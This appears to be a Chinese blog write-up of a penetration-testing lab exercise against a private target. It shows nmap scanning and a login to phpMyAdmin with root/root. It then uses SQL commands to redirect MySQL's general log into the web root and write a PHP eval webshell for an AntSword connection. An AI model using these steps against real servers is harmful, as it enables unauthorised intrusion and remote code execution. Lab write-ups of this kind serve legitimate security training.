第二周渗透测试靶场实践

本文详细记录了一次渗透测试的过程,从信息收集(端口扫描、漏洞利用)到后渗透阶段(反弹shell、提权),再到利用cs与msf设置代理,深入内网进行信息收集,并最终获取内网主机权限。涉及技术包括nmap、phpMyadmin弱口令、YXCMS漏洞、蚁剑、msfvenom、Meterpreter、CS(Cobalt Strike)等。
摘要由CSDN通过智能技术生成

信息收集

扫描端口

  • 靶场地址:10.203.87.175
  • nmap -sS -sV -A 10.203.87.175

请添加图片描述

  • 开了80端口,浏览器打开

请添加图片描述

  • 发现备份文件,点击备份文件,解压

请添加图片描述

  • 打开每个文件看看

请添加图片描述

  • 有可能是网站中刚打开的YXCMS,回到网站,点击XYCMS

请添加图片描述

漏洞利用

phpMyadmin

请添加图片描述

  • 通过弱口令root/root进入

请添加图片描述

  • select @@basedir; //查询路径

请添加图片描述

  • show global variables like ‘%general%’; //查看general*值

请添加图片描述

  • general_log为OFF
  • set global general_log=on; //开启日志

请添加图片描述- 再次看一遍日志

请添加图片描述

  • set global general_log_file=‘C:/phpstudy/www/llljy.php’; //设置日志存放文件

请添加图片描述

  • select ‘<?php eval($_POST["nnn"]);?>’ //执行语句,会写入我们设置的llljy.php中

请添加图片描述

  • 蚁剑连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值